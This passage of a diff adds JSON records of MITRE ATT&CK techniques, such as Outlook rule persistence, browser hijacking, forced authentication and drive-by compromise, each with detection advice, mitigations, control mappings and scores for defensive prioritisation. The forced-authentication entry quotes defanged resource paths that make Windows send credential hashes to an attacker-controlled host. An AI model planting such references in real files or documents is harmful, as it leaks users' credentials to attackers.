+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1137",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SC-18",
+            "SC-44",
+            "SI-2",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1137.005",
+        "name": "Office Application Startup: Outlook Rules",
+        "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)",
+        "url": "https://attack.mitre.org/techniques/T1137/005",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1137",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SC-18",
+            "SC-44",
+            "SI-2",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1137.006",
+        "name": "Office Application Startup: Add-ins",
+        "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ",
+        "url": "https://attack.mitre.org/techniques/T1137/006",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1137",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.17142857142857143,
+        "adjusted_score": 0.17142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SC-18",
+            "SC-44",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1140",
+        "name": "Deobfuscate/Decode Files or Information",
+        "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",
+        "url": "https://attack.mitre.org/techniques/T1140",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Modification",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.5678386847619047,
+        "adjusted_score": 0.5678386847619047,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.10476190476190475,
+            "detection_score": 0.22
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.36307678
+    },
+    {
+        "tid": "T1176",
+        "name": "Browser Extensions",
+        "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)",
+        "url": "https://attack.mitre.org/techniques/T1176",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.\n\nOn macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1033",
+                "name": "Limit Software Installation",
+                "description": "Block users or groups from installing unapproved software.",
+                "url": "https://attack.mitre.org/mitigations/M1033"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.3243595138095238,
+        "adjusted_score": 0.3243595138095238,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "9.4",
+            "14.4",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-11",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "RA-5",
+            "SC-7",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.22380952380952382,
+            "mitigation_score": 0.41818181818181815,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00054999
+    },
+    {
+        "tid": "T1185",
+        "name": "Browser Session Hijacking",
+        "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)",
+        "url": "https://attack.mitre.org/techniques/T1185",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.30878105476190476,
+        "adjusted_score": 0.30878105476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.7",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.4"
+        ],
+        "nist_controls": [
+            "AC-10",
+            "AC-12",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "IA-2",
+            "SC-23",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.20476190476190478,
+            "mitigation_score": 0.38181818181818183,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00401915
+    },
+    {
+        "tid": "T1187",
+        "name": "Forced Authentication",
+        "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)",
+        "url": "https://attack.mitre.org/techniques/T1187",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Access",
+            "File: File Creation",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.35476190476190483,
+        "adjusted_score": 0.35476190476190483,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.2",
+            "7.6",
+            "7.7",
+            "13.4",
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.20476190476190478,
+            "mitigation_score": 0.34545454545454546,
+            "detection_score": 0.05
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1189",
+        "name": "Drive-by Compromise",
+        "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)",
+        "url": "https://attack.mitre.org/techniques/T1189",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+        "platforms": [
+            "Linux",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.4244441238095238,
+        "adjusted_score": 0.4244441238095238,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.7",
+            "7.1",
+            "7.2",
+            "7.4",
+            "7.5",
+            "9.1",
+            "9.3",
+            "9.6",
+            "10.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "SA-22",
+            "SC-18",
+            "SC-2",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-39",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.32380952380952377,
+            "mitigation_score": 0.5454545454545454,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.0006346
+    },
+    {
+        "tid": "T1190",
+        "name": "Exploit Public-Facing Application",
+        "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
+        "url": "https://attack.mitre.org/techniques/T1190",
+        "tactics": [
+            "Initial Access"
+        ],
+        "detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+        "platforms": [
+            "Containers",
+            "IaaS",
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1016",
+                "name": "Vulnerability Scanning",
+                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                "url": "https://attack.mitre.org/mitigations/M1016"
+            }
+        ],
+        "cumulative_score": 1.083194640952381,
+        "adjusted_score": 1.083194640952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "4.4",
+            "4.7",
+            "5.3",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.6",
+            "7.7",
+            "10.5",
+            "12.1",
+            "12.2",
+            "12.8",
+            "16.13",
+            "16.8",
+            "18.1",
+            "18.2",
+            "18.3",
+            "13.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-2",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-8",
+            "RA-10",
+            "RA-5",
+            "SA-8",
+            "SC-18",
+            "SC-2",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-39",
+            "SC-46",
+            "SC-7",
+            "SI-10",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.9809523809523809,
+            "mitigation_score": 0.9636363636363636,
+            "detection_score": 1
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00224226
+    },
+    {
+        "tid": "T1195",
+        "name": "Supply Chain Compromise",
